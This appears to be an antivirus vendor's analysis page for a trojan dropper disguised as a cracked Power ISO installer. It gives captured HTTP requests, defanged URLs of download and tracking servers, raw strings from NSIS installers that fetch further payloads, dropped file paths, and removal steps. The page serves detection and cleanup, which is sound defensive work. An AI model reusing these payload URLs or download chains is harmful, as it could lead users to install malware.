Content-Type: text/html; charset=iso-8859-1
Date: Wed, 16 Sep 2015 23:18:16 GMT
Expires: Sat, 26 Jul 1997 05:00:00 GMT
Location: hXXp://up.ic-int-34.xyz/offer.php?affId=1006&trackingId=1542762&instId=13&ho_trackingid=102a59674e2aa97a57cdd16e9672fc&cc=UA
P3P: CP="NOI CUR OUR NOR INT"
Pragma: no-cache
Server: nginx/1.7.9
Set-Cookie: enc_aff_session_4=ENC02414-102a59674e2aa97a57cdd16e9672fc-1006-4-0-0-0-0-UA-2-3133-31353035-34343232303136-30-30-30-194.242.96.218-20150916191816-_-7B11052C012208017E2C314C091A2D4425345F124F02015B1C1F4246271F1621094249011631144801; expires=Fri, 16 Oct 2015 23:18:16 GMT; path=/;
Set-Cookie: ho_mob=eyJtb2JpbGVfZGV2aWNlX29zIjoiRGVza3RvcCIsIm1vYmlsZV9kZXZpY2VfbW9kZWwiOiJGaXJlZm94IiwibW9iaWxlX2RldmljZV9icmFuZCI6Ik1vemlsbGEiLCJtb2JpbGVfYnJvd3NlciI6IkZpcmVmb3ggRGVza3RvcCIsIm1vYmlsZV9icm93c2VyX3ZlcnNpb24iOiIyLjAiLCJtb2JpbGVfY2FycmllciI6Ij8iLCJ1c2VyX2FnZW50IjoiTW96aWxsYS81LjAgKFdpbmRvd3M7IFU7IFdpbmRvd3MgTlQgNS4xOyBGcjsgUnY6MS44LjEuMykgR2Vja28vMjAwNzAzMDkgRmlyZWZveC8yLjAuMC4zIiwiY29ubmVjdGlvbl9zcGVlZCI6ImJyb2FkYmFuZCJ9; expires=Sat, 11 Aug 2018 09:58:16 GMT; path=/;
tracking_id: 102a59674e2aa97a57cdd16e9672fc
X-Robots-Tag: noindex, nofollow
Content-Length: 324
Connection: Close
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">.<html>&
lt;head>.<title>302 Found</title>.</head><body
>.<h1>Found</h1>.<p>The document has moved <a 
href="hXXp://up.ic-int-34.xyz/offer.php?affId=1006&trackingId=1542
762&instId=13&ho_trackingid=102a59674e2aa97a57cdd16e9672fc&
;cc=UA">here</a>.</p>.</body></html>...
<<< skipped >>>


POST hXXp://up.ic-int-34.xyz/installer.php?affId=1006&instId=13&ho_trackingid=102a59674e2aa97a57cdd16e9672fc&trackingId=1542762&cc=UA HTTP/1.1
Host: up.ic-int-34.xyz
Connection: close
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.8.1.3) Gecko/20070309 Firefox/2.0.0.3
Content-Type: application/x-www-form-urlencoded

id[]=29&id[]=34&id[]=35&id[]=36&id[]=37&id[]=38&id[]=39&id[]=40&id[]=41&id[]=42&id[]=43&id[]=44&id[]=45&id[]=46&id[]=47&id[]=48&id[]=49&id[]=50&id[]=51&id[]=52&id[]=53&id[]=54&id[]=55&id[]=56&id[]=57
HTTP/1.1 403 Forbidden
Server: CloudFront
Date: Wed, 16 Sep 2015 23:18:17 GMT
Content-Type: text/html
Content-Length: 689
Connection: close
X-Cache: Error from cloudfront
Via: 1.1 13e5d0f9ce0aa646324430e310892965.cloudfront.net (CloudFront)
X-Amz-Cf-Id: 2s5DXzxCejwv7P75bcradWM4VWjjQ74qdTAbUJmU7LNg02dVD2UQFg==
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "htt
p://VVV.w3.org/TR/html4/loose.dtd">.<HTML><HEAD><MET
A HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=iso-8859-1">
;.<TITLE>ERROR: The request could not be satisfied</TITLE>
.</HEAD><BODY>.<H1>ERROR</H1>.<H2>The re
quest could not be satisfied.</H2>.<HR noshade size="1px">
.This distribution is not configured to allow the HTTP request method 
that was used for this request. The distribution supports only cachabl
e requests..<BR clear="all">.<HR noshade size="1px">.<P
RE>.Generated by cloudfront (CloudFront).Request ID: 2s5DXzxCejwv7P
75bcradWM4VWjjQ74qdTAbUJmU7LNg02dVD2UQFg==.</PRE>.<ADDRESS>
;.</ADDRESS>.</BODY></HTML>..

The Trojan connects to the servers at the folowing location(s):

%original file name%.exe_276:

.text
`.rdata
@.data
.ndata
.rsrc
@.reloc
RegDeleteKeyExW
Kernel32.DLL
PSAPI.DLL
%s=%s
GetWindowsDirectoryW
KERNEL32.dll
ExitWindowsEx
GetAsyncKeyState
USER32.dll
GDI32.dll
SHFileOperationW
ShellExecuteW
SHELL32.dll
RegDeleteKeyW
RegCloseKey
RegEnumKeyW
RegOpenKeyExW
RegCreateKeyExW
ADVAPI32.dll
COMCTL32.dll
ole32.dll
VERSION.dll
invalid URL
Host: %s
GET %s HTTP/1.0
User-Agent: NSISDL/1.2 (Mozilla)
http=
Unable to open %s
%skB (%d%%) of %skB at %u.ukB/s
(%u hours remaining)
(%u minutes remaining)
(%u seconds remaining)
Downloading %s
WS2_32.dll
NSISdl.dll
.reloc
System.dll
.hXXp://crl.thawte.com/ThawteTimestampingCA.crl0
hXXp://ts-ocsp.ws.symantec.com07
 hXXp://ts-aia.ws.symantec.com/tss-ca-g2.cer0<
 hXXp://ts-crl.ws.symantec.com/tss-ca-g2.crl0(
2Terms of use at hXXps://VVV.verisign.com/rpa (c)101.0,
/hXXp://csc3-2010-crl.verisign.com/CSC3-2010.crl0D
hXXps://VVV.verisign.com/rpa0
hXXp://ocsp.verisign.com0;
/hXXp://csc3-2010-aia.verisign.com/CSC3-2010.cer0
<VeriSign Class 3 Public Primary Certification Authority - G50
hXXps://VVV.verisign.com/cps0*
#hXXp://logo.verisign.com/vslogo.gif04
#hXXp://crl.verisign.com/pca3-g5.crl04
hXXp://ocsp.verisign.com0
.uy}"
<?xml version="1.0" encoding="UTF-8" standalone="yes"?><assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"><assemblyIdentity version="1.0.0.0" processorArchitecture="X86" name="Nullsoft.NSIS.exehead" type="win32"/><description>Nullsoft Install System v2.46.5-Unicode</description><trustInfo xmlns="urn:schemas-microsoft-com:asm.v3"><security><requestedPrivileges><requestedExecutionLevel level="requireAdministrator" uiAccess="false"/></requestedPrivileges></security></trustInfo><compatibility xmlns="urn:schemas-microsoft-com:compatibility.v1"><application><supportedOS Id="{35138b9a-5d96-4fbd-8e2d-a2440225f93a}"/><supportedOS Id="{e2011457-1546-43c5-a5fe-008deee3d3f0}"/></application></compatibility></assembly>
logging set to %d
settings logging to %d
created uninstaller: %d, "%s"
WriteReg: error creating key "%s\%s"
WriteReg: error writing into "%s\%s" "%s"
WriteRegBin: "%s\%s" "%s"="%s"
WriteRegDWORD: "%s\%s" "%s"="0xx"
WriteRegExpandStr: "%s\%s" "%s"="%s"
WriteRegStr: "%s\%s" "%s"="%s"
DeleteRegKey: "%s\%s"
DeleteRegValue: "%s\%s" "%s"
WriteINIStr: wrote [%s] %s=%s in %s
CopyFiles "%s"->"%s"
CreateShortCut: out: "%s", in: "%s %s", icon: %s,%d, sw=%d, hk=%d
Error registering DLL: Could not load %s
Error registering DLL: %s not found in %s
GetTTFFontName(%s) returned %s
GetTTFVersionString(%s) returned %s
Exec: failed createprocess ("%s")
Exec: success ("%s")
Exec: command="%s"
ExecShell: success ("%s": file:"%s" params:"%s")
ExecShell: warning: error ("%s": file:"%s" params:"%s")=%d
Exch: stack < %d elements
RMDir: "%s"
MessageBox: %d,"%s"
Delete: "%s"
File: wrote %d to "%s"
File: skipped: "%s" (overwriteflag=%d)
File: error creating "%s"
File: overwriteflag=%d, allowskipfilesflag=%d, name="%s"
Rename failed: %s
Rename on reboot: %s
Rename: %s
IfFileExists: file "%s" does not exist, jumping %d
IfFileExists: file "%s" exists, jumping %d
CreateDirectory: "%s" created
CreateDirectory: can't create "%s" - a file already exists
CreateDirectory: can't create "%s" (err=%d)
CreateDirectory: "%s" (%d)
SetFileAttributes: "%s":X
Sleep(%d)
detailprint: %s
Call: %d
Aborting: "%s"
Jump: %d
verifying installer: %d%%
... %d%%
hXXp://nsis.sf.net/NSIS_Error
~nsu.tmp
install.log
%u.%u%s%s
Skipping section: "%s"
Section: "%s"
New install of "%s" to "%s"
.DEFAULT\Control Panel\International
Software\Microsoft\Windows\CurrentVersion
*?|<>/":
invalid registry key
HKEY_DYN_DATA
HKEY_CURRENT_CONFIG
HKEY_PERFORMANCE_DATA
HKEY_USERS
HKEY_LOCAL_MACHINE
HKEY_CURRENT_USER
HKEY_CLASSES_ROOT
x%c
RMDir: RemoveDirectory failed("%s")
RMDir: RemoveDirectory on Reboot("%s")
RMDir: RemoveDirectory("%s")
RMDir: RemoveDirectory invalid input("%s")
Delete: DeleteFile failed("%s")
Delete: DeleteFile on Reboot("%s")
Delete: DeleteFile("%s")
%s: failed opening file "%s"
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsp2.tmp\OoRnTsSavW.exe
tid=4422016&pid=1505&b_typ=pe&reb=1&name=Power iso 6.2 final crack [230815BAP]
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsp2.tmp\NSISdl.dll
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsp2.tmp
ogram=sevenzip&tid=4422016&pid=1505&b_typ=pe&reb=1&name=Power iso 6.2 final crack [230815BAP]
Software\Microsoft\Windows\CurrentVersion\Internet Settings
callback%d
kernel32.dll
nsp2.tmp
Exec: success ("C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsp2.tmp\OoRnTsSavW.exe")
.tmp\NSISdl.dll"
E~1\"%CurrentUserName%"\LOCALS~1\Temp\nsp2.tmp\EYogau3uc3
zip&tid=4422016&pid=1505&b_typ=pe&reb=1&name=Power iso 6.2 final crack [230815BAP]
l.ic-free.xyz/stub_maker.php?program=sevenzip&tid=4422016&pid=1505&b_typ=pe&reb=1&name=Power iso 6.2 final crack [230815BAP]
c:\%original file name%.exe
%original file name%.exe
CUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsk1.tmp
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\
201509162318
hXXp://dl.ic-free.xyz/stub_maker.php?program=sevenzip&tid=4422016&pid=1505&b_typ=pe&reb=1&name=Power iso 6.2 final crack [230815BAP]

OoRnTsSavW.exe_1620:

64*46%*56
.text
`.rdata
@.data
.ndata
.rsrc
@.reloc
RegDeleteKeyExW
Kernel32.DLL
PSAPI.DLL
%s=%s
GetWindowsDirectoryW
KERNEL32.dll
ExitWindowsEx
GetAsyncKeyState
USER32.dll
GDI32.dll
SHFileOperationW
ShellExecuteW
SHELL32.dll
RegDeleteKeyW
RegCloseKey
RegEnumKeyW
RegOpenKeyExW
RegCreateKeyExW
ADVAPI32.dll
COMCTL32.dll
ole32.dll
VERSION.dll
l;`]w`#r%s
7.rdata
KERNEL32.DLL
nsArray.dll
Join
invalid URL
Host: %s
GET %s HTTP/1.0
User-Agent: NSISDL/1.2 (Mozilla)
http=
Unable to open %s
%skB (%d%%) of %skB at %u.ukB/s
(%u hours remaining)
(%u minutes remaining)
(%u seconds remaining)
Downloading %s
WS2_32.dll
NSISdl.dll
<?xml version="1.0" encoding="UTF-8" standalone="yes"?><assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"><assemblyIdentity version="1.0.0.0" processorArchitecture="X86" name="Nullsoft.NSIS.exehead" type="win32"/><description>Nullsoft Install System v2.46.5-Unicode</description><dependency><dependentAssembly><assemblyIdentity type="win32" name="Microsoft.Windows.Common-Controls" version="6.0.0.0" processorArchitecture="X86" publicKeyToken="6595b64144ccf1df" language="*" /></dependentAssembly></dependency><trustInfo xmlns="urn:schemas-microsoft-com:asm.v3"><security><requestedPrivileges><requestedExecutionLevel level="requireAdministrator" uiAccess="false"/></requestedPrivileges></security></trustInfo><compatibility xmlns="urn:schemas-microsoft-com:compatibility.v1"><application><supportedOS Id="{35138b9a-5d96-4fbd-8e2d-a2440225f93a}"/><supportedOS Id="{e2011457-1546-43c5-a5fe-008deee3d3f0}"/></application></compatibility></assembly>
logging set to %d
settings logging to %d
created uninstaller: %d, "%s"
WriteReg: error creating key "%s\%s"
WriteReg: error writing into "%s\%s" "%s"
WriteRegBin: "%s\%s" "%s"="%s"
WriteRegDWORD: "%s\%s" "%s"="0xx"
WriteRegExpandStr: "%s\%s" "%s"="%s"
WriteRegStr: "%s\%s" "%s"="%s"
DeleteRegKey: "%s\%s"
DeleteRegValue: "%s\%s" "%s"
WriteINIStr: wrote [%s] %s=%s in %s
CopyFiles "%s"->"%s"
CreateShortCut: out: "%s", in: "%s %s", icon: %s,%d, sw=%d, hk=%d
Error registering DLL: Could not load %s
Error registering DLL: %s not found in %s
GetTTFFontName(%s) returned %s
GetTTFVersionString(%s) returned %s
Exec: failed createprocess ("%s")
Exec: success ("%s")
Exec: command="%s"
ExecShell: success ("%s": file:"%s" params:"%s")
ExecShell: warning: error ("%s": file:"%s" params:"%s")=%d
Exch: stack < %d elements
RMDir: "%s"
MessageBox: %d,"%s"
Delete: "%s"
File: wrote %d to "%s"
File: skipped: "%s" (overwriteflag=%d)
File: error creating "%s"
File: overwriteflag=%d, allowskipfilesflag=%d, name="%s"
Rename failed: %s
Rename on reboot: %s
Rename: %s
IfFileExists: file "%s" does not exist, jumping %d
IfFileExists: file "%s" exists, jumping %d
CreateDirectory: "%s" created
CreateDirectory: can't create "%s" - a file already exists
CreateDirectory: can't create "%s" (err=%d)
CreateDirectory: "%s" (%d)
SetFileAttributes: "%s":X
Sleep(%d)
detailprint: %s
Call: %d
Aborting: "%s"
Jump: %d
verifying installer: %d%%
... %d%%
hXXp://nsis.sf.net/NSIS_Error
~nsu.tmp
install.log
%u.%u%s%s
Skipping section: "%s"
Section: "%s"
New install of "%s" to "%s"
.DEFAULT\Control Panel\International
Software\Microsoft\Windows\CurrentVersion
*?|<>/":
invalid registry key
HKEY_DYN_DATA
HKEY_CURRENT_CONFIG
HKEY_PERFORMANCE_DATA
HKEY_USERS
HKEY_LOCAL_MACHINE
HKEY_CURRENT_USER
HKEY_CLASSES_ROOT
x%c
RMDir: RemoveDirectory failed("%s")
RMDir: RemoveDirectory on Reboot("%s")
RMDir: RemoveDirectory("%s")
RMDir: RemoveDirectory invalid input("%s")
Delete: DeleteFile failed("%s")
Delete: DeleteFile on Reboot("%s")
Delete: DeleteFile("%s")
%s: failed opening file "%s"
"C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsy4.tmp\cpSetup.exe"
24/SevenZip_downloader-QaL7ei07s.exe
iso%206.2%20final%20crack%20%5B230&producturl=http://d3pccup19xda2t.cloudfront.net/sevenzip-setup-ap.exe&productimage=http://d3pccup19xda2t.cloudfront.net/pe/szip_pub.png&productversion=9.20&producteula=http://sevenzip.info/terms.html&productsize=1.06MB&productcmd=s&publishercontact=http://sevenzip.info&productbusiness=sd,se,ad,co,prm,wsa,ita,serp,bro&antivirusPolicy=2&subid=1505&subid2=4422016
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsy4.tmp\NSISdl.dll
E~1\"%CurrentUserName%"\LOCALS~1\Temp\nsy4.tmp
E~1\"%CurrentUserName%"\LOCALS~1\Temp\nsy4.tmp\NSISdl.dll
1.1.1.6
Software\Microsoft\Windows\CurrentVersion\Internet Settings
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsy4.tmp
cpSetup.exe
Exec: success (""C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsy4.tmp\cpSetup.exe"")
ISdl.dll"
520iso%206.2%20final%20crack%20%5B230&s1=1505&s2=4422016&setupName=cpSetup&appVersion=2.92&instId=13
cup19xda2t.cloudfront.net/sevenzip-setup-ap.exe&productimage=http://d3pccup19xda2t.cloudfront.net/pe/szip_pub.png&productversion=9.20&producteula=http://sevenzip.info/terms.html&productsize=1.06MB&productcmd=s&publishercontact=http://sevenzip.info&productbusiness=sd,se,ad,co,prm,wsa,ita,serp,bro&antivirusPolicy=2&subid=1505&subid2=4422016
2024497
224/SevenZip_downloader-QaL7ei07s.exe
nloader-QaL7ei07s.exe
cli/1442444476224/SevenZip_downloader-QaL7ei07s.exe
23456789 /
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsp2.tmp\OoRnTsSavW.exe
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsp2.tmp
OoRnTsSavW.exe
CUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsy3.tmp
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\
3289904
hXXp://get.ic-dri-76.xyz/?affId=1006&appTitle=Power%20iso%206.2%20final%20crack%20%5B230&s1=1505&s2=4422016&setupName=cpSetup&appVersion=2.92&instId=13
19xda2t.cloudfront.net/sevenzip-setup-ap.exe&productimage=http://d3pccup19xda2t.cloudfront.net/pe/szip_pub.png&productversion=9.20&producteula=http://sevenzip.info/terms.html&productsize=1.06MB&productcmd=s&publishercontact=http://sevenzip.info&productbusiness=sd,se,ad,co,prm,wsa,ita,serp,bro&antivirusPolicy=2&subid=1505&subid2=4422016
hXXp://up.int-ic-4.xyz/launch_v5.php?p=sevenzip&pid=1505&tid=4422016&b_typ=pe&n=UG93ZXIgaXNvIDYuMiBmaW5hbCBjcmFjayBbMjMw&reb=1&ic=

OoRnTsSavW.exe_1620_rwx_10001000_00007000:

.text
`.rdata
@.data
.rsrc
@.reloc
/key=

cpSetup.exe_1136:

.text
`.rdata
@.data
.ndata
.rsrc
uDSSh
.DEFAULT\Control Panel\International
Software\Microsoft\Windows\CurrentVersion
GetWindowsDirectoryA
KERNEL32.dll
ExitWindowsEx
USER32.dll
GDI32.dll
SHFileOperationA
ShellExecuteA
SHELL32.dll
RegEnumKeyA
RegCreateKeyExA
RegCloseKey
RegDeleteKeyA
RegOpenKeyExA
ADVAPI32.dll
COMCTL32.dll
ole32.dll
VERSION.dll
verifying installer: %d%%
unpacking data: %d%%
... %d%%
hXXp://nsis.sf.net/NSIS_Error
~nsu.tmp
%u.%u%s%s
RegDeleteKeyExA
%s=%s
*?|<>/":
\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsf7.tmp\b61595bf-da45-4e15-927c-f49de52b0e6d.dll
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsf7.tmp\b61595bf-da45-4e15-927c-f49de52b0e6d.dll
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsf7.tmp
%Program Files%
\b61595bf-da45-4e15-927c-f49de52b0e6d.dll
$$\wininit.ini
@.reloc
subid1: %s
subid2: %s
subid3: %s
subid4: %s
subid5: %s
url1: %s
url2: %s
apptitle: %S
appimgurl: %s
appsetupurl: %s
appcmd: %s
apptyurl: %s
appversion: %s
Offer path: %s
Offer retruned: %s
hXXp://
Stub.dll
GetProcessHeap
<requestedExecutionLevel level='asInvoker' uiAccess='false' />
<assemblyIdentity type='win32' name='Microsoft.Windows.Common-Controls' version='6.0.0.0' processorArchitecture='x86' publicKeyToken='6595b64144ccf1df' language='*' />
nsf7.tmp
:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsf7.tmp
"C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsy4.tmp\cpSetup.exe"
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsy4.tmp
cpSetup.exe
CUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsf5.tmp
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsy4.tmp\cpSetup.exe
:::#222.111 )))
<?xml version="1.0" encoding="UTF-8" standalone="yes"?><assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"><assemblyIdentity version="1.0.0.0" processorArchitecture="X86" name="Nullsoft.NSIS.exehead" type="win32"/><description>Nullsoft Install System v2.46</description><trustInfo xmlns="urn:schemas-microsoft-com:asm.v3"><security><requestedPrivileges><requestedExecutionLevel level="requireAdministrator" uiAccess="false"/></requestedPrivileges></security></trustInfo><compatibility xmlns="urn:schemas-microsoft-com:compatibility.v1"><application><supportedOS Id="{35138b9a-5d96-4fbd-8e2d-a2440225f93a}"/><supportedOS Id="{e2011457-1546-43c5-a5fe-008deee3d3f0}"/></application></compatibility></assembly>


Remove it with Ad-Aware

  1. Click (here) to download and install Ad-Aware Free Antivirus.
  2. Update the definition files.
  3. Run a full scan of your computer.


Manual removal*

  1. Terminate malicious process(es) (How to End a Process With the Task Manager):No processes have been created.
  2. Delete the original Trojan file.
  3. Delete or disinfect the following files created/modified by the Trojan:

    %Documents and Settings%\%current user%\Local Settings\Temp\nsy4.tmp\NSISdl.dll (15 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsy4.tmp\752024497 (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsy4.tmp\nsArray.dll (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsy4.tmp\cpSetup.exe (4568 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsp2.tmp\EYogau3uc3 (147 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsp2.tmp\System.dll (11 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsp2.tmp\NSISdl.dll (15 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsp2.tmp\OoRnTsSavW.exe (11558 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\00080d09.a (28 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsf6.tmp (23 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\000811bc.a (1690 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsf7.tmp\b61595bf-da45-4e15-927c-f49de52b0e6d.dll (784 bytes)

  4. Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
  5. Reboot the computer.

*Manual removal may cause unexpected system behaviour and should be performed at your own risk.

No votes yet


Lavasoft is the maker of Ad-Aware, the world's most popular anti-malware software with over 450 million downloads.
© 2026 Lavasoft. All rights reserved.
Terms Of Use |   Privacy Policy


x

Our best antivirus yet!

Fresh new look. Faster scanning. Better protection.

Enjoy unique new features, lightning fast scans and a simple yet beautiful new look in our best antivirus yet!

For a quicker, lighter and more secure experience, download the all new adaware antivirus 12 now!

Download adaware antivirus 12
No thanks, continue to lavasoft.com
close x

Discover the new adaware antivirus 12

Our best antivirus yet

Download Now